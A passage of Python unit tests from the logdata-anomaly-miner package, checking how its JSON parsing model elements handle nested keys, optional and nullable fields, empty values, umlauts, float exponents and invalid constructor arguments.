"onclick": "OpenDoc()" }, { "value": "Close", 
"onclick": "CloseDoc()" } ] } } }""" array_of_arrays = b'{"a": [["abc", "abc", "abc"], ["abc", "abc"], ["abc"]]}' key_parser_dict = {"menu": { "id": DummyFixedDataModelElement("id", b"file"), "value": DummyFixedDataModelElement("value", b"File"), "popup": { "menuitem": [{ "value": DummyFirstMatchModelElement("buttonNames", [ DummyFixedDataModelElement("new", b"New"), DummyFixedDataModelElement("open", b"Open"), DummyFixedDataModelElement("close", b"Close")]), "onclick": DummyFirstMatchModelElement("buttonOnclick", [ DummyFixedDataModelElement("create_new_doc", b"CreateNewDoc()"), DummyFixedDataModelElement("open_doc", b"OpenDoc()"), DummyFixedDataModelElement("close_doc", b"CloseDoc()")]), "optional_key_clickable": DummyFirstMatchModelElement("clickable", [ DummyFixedDataModelElement("true", b"true"), DummyFixedDataModelElement("false", b"false")]) }, { "value": DummyFirstMatchModelElement("buttonNames", [DummyFixedDataModelElement("undo", b"Undo")]), "onclick": DummyFirstMatchModelElement("buttonOnclick", [DummyFixedDataModelElement("undo_doc", b"UndoDoc()")]), "clickable": DummyFirstMatchModelElement("clickable", [ DummyFixedDataModelElement("true", b"true"), DummyFixedDataModelElement("false", b"false")]) }] }}} key_parser_dict_allow_all = {"menu": { "id": DummyFixedDataModelElement("id", b"file"), "value": DummyFixedDataModelElement("value", b"File"), "popup": "ALLOW_ALL" }} key_parser_dict_array = {"menu": { "id": DummyFixedDataModelElement("id", b"file"), "value": DummyFixedDataModelElement("value", b"File"), "popup": [ DummyFixedDataModelElement("value", b"value") ] }} key_parser_dict_escaped = {"a": DummyFixedDataModelElement("id", b"-")} empty_key_parser_dict = {"optional_key_key": DummyFixedDataModelElement("key", b"value")} key_parser_dict_allow_all_fields = {"menu": { "id": DummyFixedDataModelElement("id", b"file") }} key_parser_dict_array_of_arrays = {"a": [[DummyFixedDataModelElement("abc", b"abc")]]} def test1get_match_element_valid_match(self): 
"""Parse matching substring from MatchContext and check if the MatchContext was updated with all characters.""" json_model_element = JsonModelElement(self.id_, self.key_parser_dict) data = self.single_line_json value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = self.multi_line_json value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = self.everything_new_line_json value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) # Test if keys differently ordered than in the key_parser_dict are parsed properly. 
data = self.single_line_different_order_with_optional_key_json value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = self.single_line_empty_array value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) json_model_element = JsonModelElement(self.id_, self.key_parser_dict_allow_all) data = self.single_line_different_order_with_optional_key_json value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) json_model_element = JsonModelElement(self.id_, self.key_parser_dict_array) data = self.single_line_json_array value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, 
match_element.children) json_model_element = JsonModelElement(self.id_, self.key_parser_dict_escaped) data = self.single_line_escaped_json.decode("unicode-escape").encode() value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) json_model_element = JsonModelElement(self.id_, self.key_parser_dict_array_of_arrays) data = self.array_of_arrays value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) def test2get_match_element_with_optional_key(self): """Validate optional keys with the optional_key_prefix.""" json_model_element = JsonModelElement(self.id_, self.key_parser_dict) data = self.single_line_with_optional_key_json value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) json_model_element = JsonModelElement(self.id_, self.empty_key_parser_dict) data = b"{}" value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(data)).encode() 
match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) json_model_element = JsonModelElement(self.id_, self.empty_key_parser_dict) data = b'{"key": "value"}' value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(data)).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) json_model_element = JsonModelElement(self.id_, self.empty_key_parser_dict) data = b'{"key": "another not matching value"}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3get_match_element_with_allow_all(self): """Test a simplified key_parser_dict with ALLOW_ALL.""" json_model_element = JsonModelElement(self.id_, self.key_parser_dict_allow_all) data = self.single_line_json value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = self.multi_line_json value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, 
self.path, str(value).encode(), value, match_element.children) data = self.everything_new_line_json value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) def test4get_match_element_with_nullable_values(self): """Test if nullable values are working as intended.""" # test functionality with objects key_parser_dict = {"+a": DummyFixedDataModelElement("a", b"a")} json_model_element = JsonModelElement(self.id_, key_parser_dict) data_null = b'{"a": null}' data_empty = b"{}" data = b'{"a": "a"}' data_object_null = b'{"a": {"b": null}}' value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) value = json.loads(data_null) match_context = DummyMatchContext(data_null) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data_null, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) # test with null value key_parser_dict = {"+a": DummyFixedDataModelElement("a", b"null")} json_model_element = JsonModelElement(self.id_, key_parser_dict) data = b'{"a": "null"}' value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = 
str(json.loads(match_context.match_string)).encode() self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) value = json.loads(data_null) match_context = DummyMatchContext(data_null) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data_null, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) # test with null key key_parser_dict = {"+null": DummyFixedDataModelElement("a", b"null")} json_model_element = JsonModelElement(self.id_, key_parser_dict) data = b'{"null": "null"}' value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) null = b'{"null": null}' value = json.loads(null) match_context = DummyMatchContext(null) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( null, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) # test functionality with arrays key_parser_dict = {"+a": [DummyFixedDataModelElement("a", b"a")]} json_model_element = JsonModelElement(self.id_, key_parser_dict) data = b'{"a": ["a"]}' value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data, match_element, match_context, self.id_, self.path, 
str(value).encode(), value, match_element.children) value = json.loads(data_null) match_context = DummyMatchContext(data_null) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data_null, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) # test functionality with json dicts key_parser_dict = {"+a": {"b": DummyFixedDataModelElement("b", b"b")}} json_model_element = JsonModelElement(self.id_, key_parser_dict) data = b'{"a": {"b": "b"}}' value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) value = json.loads(data_null) match_context = DummyMatchContext(data_null) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data_null, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) # no match with null in object key_parser_dict = {"+a": {"b": DummyFixedDataModelElement("b", b"null")}} json_model_element = JsonModelElement(self.id_, key_parser_dict) match_context = DummyMatchContext(data_object_null) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data_object_null, match_element, match_context) # test interchangeability with optional_key_prefix key_parser_dict = {"+optional_key_a": DummyFixedDataModelElement("a", b"a")} json_model_element = JsonModelElement(self.id_, key_parser_dict) data = b'{"a": "a"}' value = json.loads(data) 
match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) value = json.loads(data_null) match_context = DummyMatchContext(data_null) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data_null, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) value = json.loads(data_empty) match_context = DummyMatchContext(data_empty) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data_empty, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) key_parser_dict = {"optional_key_+a": DummyFixedDataModelElement("a", b"a")} json_model_element = JsonModelElement(self.id_, key_parser_dict) data = b'{"a": "a"}' value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) value = json.loads(data_null) match_context = DummyMatchContext(data_null) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data_null, match_element, match_context, self.id_, self.path, str(value).encode(), value, 
match_element.children) value = json.loads(data_empty) match_context = DummyMatchContext(data_empty) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data_empty, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) def test5get_match_element_null_value(self): """Test if null keys and values can be used.""" key_parser_dict = { "works": DummyFirstMatchModelElement("id", [ DummyFixedDataModelElement("abc", b"abc"), DummyFixedDataModelElement("123", b"123")]), "null": "NULL_OBJECT" } data1 = b"""{ "works": "123", "null": null }""" data2 = b"""{"a": {"b": "c"}}""" data3 = b"""{"a": null}""" json_model_element = JsonModelElement(self.id_, key_parser_dict) data = data1 value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) key_parser_dict = {"a": {"b": DummyFixedDataModelElement("c", b"c")}} json_model_element = JsonModelElement(self.id_, key_parser_dict) data = data2 value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = data3 match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) 
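# Methods below continue the enclosing test class (its header and the earlier test methods lie above this chunk).
    def _parse_and_compare(self, json_model_element, data, normalize=False, cut_match_data=True, parse_float=None):
        """
        Parse data with json_model_element and compare the result through self.compare_match_results.
        data: raw JSON bytes handed to a DummyMatchContext.
        normalize: when True the expected match_string is rebuilt from the parser's own match_string
            (str(json.loads(match_context.match_string)).encode()); otherwise it is str(json.loads(data)).encode().
        cut_match_data: when True match_data is recomputed as the bytes of data following match_string.
        parse_float: forwarded to json.loads when building the expected value (None keeps the default float parsing).
        """
        value = json.loads(data, parse_float=parse_float)
        match_context = DummyMatchContext(data)
        match_element = json_model_element.get_match_element(self.path, match_context)
        if normalize:
            match_context.match_string = str(json.loads(match_context.match_string)).encode()
        else:
            match_context.match_string = str(value).encode()
        if cut_match_data:
            match_context.match_data = data[len(match_context.match_string):]
        self.compare_match_results(
            data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children)

    def _parse_and_expect_no_match(self, json_model_element, data):
        """Parse data with json_model_element and check through self.compare_no_match_results that nothing matched."""
        match_context = DummyMatchContext(data)
        match_element = json_model_element.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)

    def test6get_match_element_with_umlaut(self):
        """Test if ä ö ü are used correctly (UTF-8 encoded on both the parser and the data side)."""
        key_parser_dict = {"works": DummyFixedDataModelElement("abc", "a ä ü ö z".encode("utf-8"))}
        json_model_element = JsonModelElement(self.id_, key_parser_dict)
        self._parse_and_compare(json_model_element, """{ "works": "a ä ü ö z" }""".encode("utf-8"))

    def test7get_match_element_same_value_as_key(self):
        """Test if objects whose value equals (or overlaps) the key name are parsed correctly for every alternative."""
        key_parser_dict = {"abc": DummyFirstMatchModelElement("first", [
            DummyFixedDataModelElement("abc", b"abc"), DummyFixedDataModelElement("abc", b"ab"),
            DummyFixedDataModelElement("abc", b"bc"), DummyFixedDataModelElement("abc", b"ba"),
            DummyFixedDataModelElement("abc", b"b"), DummyFixedDataModelElement("abc", b"d")])}
        for data in (b'{"abc":"abc"}', b'{"abc":"ab"}', b'{"abc":"bc"}', b'{"abc":"b"}', b'{"abc":"d"}', b'{"abc":"ba"}'):
            self._parse_and_compare(JsonModelElement(self.id_, key_parser_dict), data)

    def test8get_match_element_empty_array_empty_object_null(self):
        """Test if the keywords EMPTY_ARRAY, EMPTY_OBJECT, EMPTY_STRING, NULL_OBJECT and ALLOW_ALL_KEYS work properly."""
        key_parser_dict = {
            "menu": {
                "id": "EMPTY_OBJECT",
                "value": "EMPTY_ARRAY",
                "popup": {"menuitem": [{
                    "value": "NULL_OBJECT",
                    "onclick": DummyFirstMatchModelElement("buttonOnclick", [
                        DummyFixedDataModelElement("create_new_doc", b"CreateNewDoc()"),
                        DummyFixedDataModelElement("open_doc", b"OpenDoc()"),
                        DummyFixedDataModelElement("close_doc", b"CloseDoc()")]),
                    "optional_key_clickable": DummyFirstMatchModelElement("clickable", [
                        DummyFixedDataModelElement("true", b"true"), DummyFixedDataModelElement("false", b"false")])}]}},
            "a": "EMPTY_ARRAY",
            "b": "EMPTY_OBJECT",
            "c": "EMPTY_STRING"}
        json_model_element = JsonModelElement(self.id_, key_parser_dict)
        # shared "menu" part of the inputs; only the trailing "a"/"b"/"c" values vary between the cases
        menu = b'{"menu": {"id": {}, "value": [], "popup": {"menuitem": [{"value": null, "onclick": "CreateNewDoc()"}, {"value": null, ' \
               b'"onclick": "OpenDoc()"}, {"value": null, "onclick": "CloseDoc()"}]}}'
        self._parse_and_compare(json_model_element, menu + b', "a": [], "b": {}, "c": ""}', normalize=True, cut_match_data=False)
        # line breaks inside the empty object / array
        data = b'{"menu": {"id": {\n}, "value": [\n], "popup": {"menuitem": [{"value": null, "onclick": "CreateNewDoc()"}, {"value": ' \
               b'null, "onclick": "OpenDoc()"}, {"value": null, "onclick": "CloseDoc()"}]}}, "a": [], "b": {}, "c": ""}'
        self._parse_and_compare(json_model_element, data, normalize=True)
        # an empty menuitem list
        data = b'{"menu": {"id": {}, "value": [], "popup": {"menuitem": []}}, "a": [], "b": {}, "c": ""}'
        self._parse_and_compare(json_model_element, data, normalize=True)
        # a parser dict consisting of a single keyword value must be constructible
        JsonModelElement(self.id_, {"a": "EMPTY_ARRAY"})
        JsonModelElement(self.id_, {"a": "EMPTY_OBJECT"})
        JsonModelElement(self.id_, {"a": "EMPTY_STRING"})
        # non-empty array, non-empty object and non-empty string where the keywords demand empty ones
        for tail in (b', "a": ["a"], "b": {}, "c": ""}', b', "a": [], "b": {"a": "a"}, "c": ""}', b', "a": [], "b": {}, "c": "ab"}'):
            self._parse_and_expect_no_match(json_model_element, menu + tail)
        # ALLOW_ALL_KEYS applies the parser to every key, whatever its name
        key_parser_dict = {"ALLOW_ALL_KEYS": DummyFirstMatchModelElement("first", [
            DummyFixedDataModelElement("abc", b"abc"), DummyFixedDataModelElement("123", b"123")])}
        json_model_element = JsonModelElement(self.id_, key_parser_dict)
        data = b'{"key1": "abc", "afd": "abc", "1234": "123", "&544": "123"}'
        self._parse_and_compare(json_model_element, data, normalize=True, cut_match_data=False)

    def test9get_match_element_float_exponents(self):
        """
        Parse float values with exponents.
        The principle of only testing dummy classes can not be applied here, as the functionality between the JsonModelElement and
        DecimalFloatValueModelElement must be tested directly.
        """
        json_model_element = JsonModelElement(self.id_, {
            "a": DecimalFloatValueModelElement(self.id_, exponent_type=DecimalFloatValueModelElement.EXP_TYPE_OPTIONAL),
            "b": DecimalFloatValueModelElement(self.id_, exponent_type=DecimalFloatValueModelElement.EXP_TYPE_OPTIONAL)})

        def format_float(val):
            """
            Used as parse_float for json.loads: a literal without exponent becomes a float, a literal with an exponent
            is re-formatted in exponent notation keeping the number of digits between the point and the exponent marker.
            """
            exp = None
            if "e" in val:
                exp = "e"
            elif "E" in val:
                exp = "E"
            sign = "+" if "+" in val else "-"
            if exp is None:
                return float(val)
            pos_point = val.find(exp)
            if "." in val:
                pos_point = val.find(".")
            formatted = format(float(val), "1.%dE" % (val.find(exp) - pos_point))
            if len(val) - val.find(sign) <= 2:
                # single-digit exponent in the input: drop the leading zero format() inserts into the exponent
                return formatted[:-2] + formatted[-1]
            return formatted

        for data in (b'{"a": 111.1, "b": 111.1}', b'{"a": 1E-01, "b": 111.1}', b'{"a": 111.1, "b": 1E-1}', b'{"a": 1E-1, "b": 1E-1}'):
            self._parse_and_compare(json_model_element, data, parse_float=format_float)

    def test10get_match_element_allow_all_fields(self):
        """Parse matching substring from MatchContext using the allow_all_fields parameter."""
        data = self.single_line_json
        json_model_element = JsonModelElement(self.id_, self.key_parser_dict_allow_all_fields, allow_all_fields=True)
        self._parse_and_compare(json_model_element, data, normalize=True, cut_match_data=False)
        # the same input is rejected once unknown fields are no longer allowed
        json_model_element = JsonModelElement(self.id_, self.key_parser_dict_allow_all_fields, allow_all_fields=False)
        self._parse_and_expect_no_match(json_model_element, data)

    def test11get_match_element_no_match(self):
        """Parse not matching substring from MatchContext and check if the MatchContext was not changed."""
        json_model_element = JsonModelElement(self.id_, self.key_parser_dict)
        for data in (
                self.single_line_missing_key_json,  # missing key
                self.single_line_object_instead_of_array,  # object instead of array
                self.single_line_invalid_json,  # invalid json
                self.single_line_no_match_json,  # child not matching
                b"{}"):  # all keys missing
            self._parse_and_expect_no_match(json_model_element, data)
        json_model_element = JsonModelElement(self.id_, self.empty_key_parser_dict)
        for data in (b"[]", b"{[]}", b'{"key": []}'):
            self._parse_and_expect_no_match(json_model_element, data)
        # child parsers inside arrays and nested objects that do not accept the given value
        for key_parser_dict, data in (
                ({"a": [{"b": DummyFixedDataModelElement("b", b"ef")}]}, b'{"a": [{"b": "fe"}]}'),
                ({"a": [DummyFixedDataModelElement("a", b"gh")]}, b'{"a": ["hg"]}'),
                ({"a": {"b": DummyFixedDataModelElement("c", b"c")}}, b'{"a": "b"}')):
            self._parse_and_expect_no_match(JsonModelElement(self.id_, key_parser_dict), data)

    def test12element_id_input_validation(self):
        """Check if element_id is validated."""
        self.assertRaises(ValueError, JsonModelElement, "", self.key_parser_dict)  # empty element_id
        # anything that is not a str is rejected by type
        for bad_id in (None, b"path", True, 123, 123.22, {"id": "path"}, ["path"], [], (), set()):
            self.assertRaises(TypeError, JsonModelElement, bad_id, self.key_parser_dict)

    def test13key_parser_dict_input_validation(self):
        """Check if key_parser_dict is validated."""
        # non-dict values, and a dict whose values are no ModelElementInterface, are rejected by type
        for bad_dict in ("path", None, b"path", True, 123, 123.22, {"id": "path"}):
            self.assertRaises(TypeError, JsonModelElement, self.id_, bad_dict)
        # a list value of any length other than 1 is rejected by value
        key_parser_dict = copy.deepcopy(self.key_parser_dict)
        key_parser_dict["menu"]["popup"]["menuitem"] = []
        self.assertRaises(ValueError, JsonModelElement, self.id_, key_parser_dict)
        for bad_dict in (["path"], [], (), set()):
            self.assertRaises(TypeError, JsonModelElement, self.id_, bad_dict)

    def test14optional_key_prefix_input_validation(self):
        """Check if optional_key_prefix is validated."""
        self.assertRaises(ValueError, JsonModelElement, self.id_, self.key_parser_dict, optional_key_prefix="")
        for bad_prefix in (None, b"path", True, 123, 123.22, {"id": "path"}, ["path"], [], (), set()):
            self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, optional_key_prefix=bad_prefix)

    def test15nullable_key_prefix_input_validation(self):
        """Check if nullable_key_prefix is validated."""
        self.assertRaises(ValueError, JsonModelElement, self.id_, self.key_parser_dict, nullable_key_prefix="")
        for bad_prefix in (None, b"path", True, 123, 123.22, {"id": "path"}, ["path"], [], (), set()):
            self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, nullable_key_prefix=bad_prefix)

    def test16allow_all_fields_input_validation(self):
        """Check if allow_all_fields is validated (only booleans are accepted)."""
        for bad_flag in ("", None, b"path", 123, 123.22, {"id": "path"}, ["path"], [], (), set()):
            self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, allow_all_fields=bad_flag)

    def test17get_match_element_match_context_input_validation(self):
        """Check if an exception is raised, when other classes than MatchContext are used in get_match_element."""
        model_element = JsonModelElement(self.id_, self.key_parser_dict)
        data = b"abcdefghijklmnopqrstuvwxyz.!?"
        # both the dummy and the real MatchContext are accepted
        model_element.get_match_element(self.path, DummyMatchContext(data))
        model_element.get_match_element(self.path, MatchContext(data))
        for not_a_context in (MatchElement(None, data, None, None), data, data.decode(), 123, 123.22, True, None, [],
                              {"key": MatchContext(data)}, set(), (), model_element):
            self.assertRaises(AttributeError, model_element.get_match_element, self.path, not_a_context)

    def test18same_optional_key_and_nullable_key_prefix(self):
        """Test if an exception is thrown if the optional_key_prefix is the same as the nullable_key_prefix."""
        self.assertRaises(
            ValueError, JsonModelElement, self.id_, self.key_parser_dict, optional_key_prefix="+", nullable_key_prefix="+")


if __name__ == "__main__":
    unittest.main()


# ---- logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/JsonStringModelElementTest.py ----
import copy
import unittest
import json
from aminer.parsing.JsonStringModelElement import JsonStringModelElement, JsonAccessObject
from aminer.parsing.MatchContext import MatchContext
from aminer.parsing.MatchElement import MatchElement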
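from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement
from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement, DummyFirstMatchModelElement


class JsonStringModelElementTest(TestBase):
    """Unittests for the JsonStringModelElement."""

    id_ = "json"
    path = "path"
    strict = False
    ignore_null = True

    def test1get_id(self):
        """Test if get_id works properly."""
        key_parser_dict = {
            "host": DummyFixedDataModelElement("host", b"www.google.com"),
            "user": DummyFixedDataModelElement("user", b"foobar")}
        json_me = JsonStringModelElement(self.id_, key_parser_dict, self.strict, self.ignore_null)
        self.assertEqual(json_me.get_id(), self.id_)

    def test2get_match_element_valid_match(self):
        """Parse a JSON line and check that the configured ModelElements are matched; with strict=False the extra key "one" is ignored."""
        key_parser_dict = {
            "host": DummyFixedDataModelElement("host", b"www.google.com"),
            "user": DummyFixedDataModelElement("user", b"foobar")}
        json_model_element = JsonStringModelElement(self.id_, key_parser_dict, self.strict, self.ignore_null)
        data = b'{"host": "www.google.com", "user": "foobar", "one": "two"}'
        match_element = json_model_element.get_match_element(self.path, DummyMatchContext(data))
        self.assertEqual(2, len(match_element.children))
        self.assertEqual(b"www.google.com", match_element.children[0].get_match_object())
        self.assertEqual(b"foobar", match_element.children[1].get_match_object())

    def test3strict_mode(self):
        """Parse JSON lines with strict_mode: any key that is not configured makes the whole line unparseable."""
        host = DummyFixedDataModelElement("host", b"www.google.com")
        user = DummyFixedDataModelElement("user", b"foobar")
        path = DummyFixedDataModelElement("path", b"/index.html")
        key_parser_dict = {"host": {"server": host}, "user": user}
        # strict_mode=True: "one": "two" is not configured, so nothing is parsed
        json_model_element = JsonStringModelElement(self.id_, key_parser_dict, True, self.ignore_null)
        data = b'{"host": {"server": "www.google.com"}, "user": "foobar", "one": "two"}'
        self.assertIsNone(json_model_element.get_match_element(self.path, DummyMatchContext(data)))
        # configuring one more key does not help while "one" stays unexpected
        key_parser_dict = {"host": {"server": host}, "user": user, "path": path}
        json_model_element = JsonStringModelElement(self.id_, key_parser_dict, True)  # ignore_null left at the constructor default
        self.assertIsNone(json_model_element.get_match_element(self.path, DummyMatchContext(data)))
        # a line matching the configuration exactly is parsed completely
        data = b'{"host": {"server": "www.google.com"}, "user": "foobar", "path": "/index.html"}'
        match_element = json_model_element.get_match_element(self.path, DummyMatchContext(data))
        self.assertEqual(3, len(match_element.children))
        self.assertEqual(b"www.google.com", match_element.children[0].get_match_object())
        self.assertEqual(b"foobar", match_element.children[1].get_match_object())
        self.assertEqual(b"/index.html", match_element.children[2].get_match_object())

    def test4ignore_null(self):
        """
        Parse JSON lines containing a null value for every combination of strict and ignore_null.
        With ignore_null=True the null key is skipped; with ignore_null=False the null is passed to the sub-parser as b"",
        so only a sub-parser accepting b"" can still match the line.
        """
        host = DummyFixedDataModelElement("host", b"www.google.com")
        key_parser_dict = {"host": host, "user": DummyFixedDataModelElement("user", b"foobar")}
        key_parser_dict_empty_user = {"host": host, "user": DummyFixedDataModelElement("user", b"")}
        with_extra_key = b'{"host": "www.google.com", "user": null, "one": "two"}'
        user_null = b'{"host": "www.google.com", "user": null}'
        # (parser dict, strict, ignore_null, data, match objects of the expected children; None means the line is unparsed)
        cases = (
            (key_parser_dict, False, True, with_extra_key, [b"www.google.com"]),
            (key_parser_dict, False, False, with_extra_key, None),
            (key_parser_dict_empty_user, False, False, user_null, [b"www.google.com", b""]),
            (key_parser_dict, True, True, user_null, [b"www.google.com"]),
            (key_parser_dict, True, False, user_null, None),
            (key_parser_dict_empty_user, True, False, user_null, [b"www.google.com", b""]),
        )
        for parser_dict, strict, ignore_null, data, expected_children in cases:
            json_model_element = JsonStringModelElement(self.id_, parser_dict, strict, ignore_null)
            match_element = json_model_element.get_match_element(self.path, DummyMatchContext(data))
            if expected_children is None:
                self.assertIsNone(match_element)
            else:
                self.assertEqual(expected_children, [child.get_match_object() for child in match_element.children])


class JsonAccessObjectTest(TestBase):
    """Unittests for the JsonAccessObject, which flattens nested JSON into dotted / indexed keys."""

    def test1get_id(self):
        """Flatten a nested dictionary and check that every leaf is reachable under its flattened key with its value."""
        nested = {
            'a': 'b',
            'c': {'w': 'g', 'rata': 'mahatta', 'tic': {'tac': 'toe'},
                  'brat': ['worst', 'wuast', {'key': ['wurst', 'fleisch'], 'food': 'veggie'}, 'blues'],
                  'bist': 'narrisch'},
            'foo': 'bar'}
        # expected flattening: "." joins nested object keys, "[i]" addresses list positions
        expected = {
            'a': 'b', 'c.w': 'g', 'c.rata': 'mahatta', 'c.tic.tac': 'toe',
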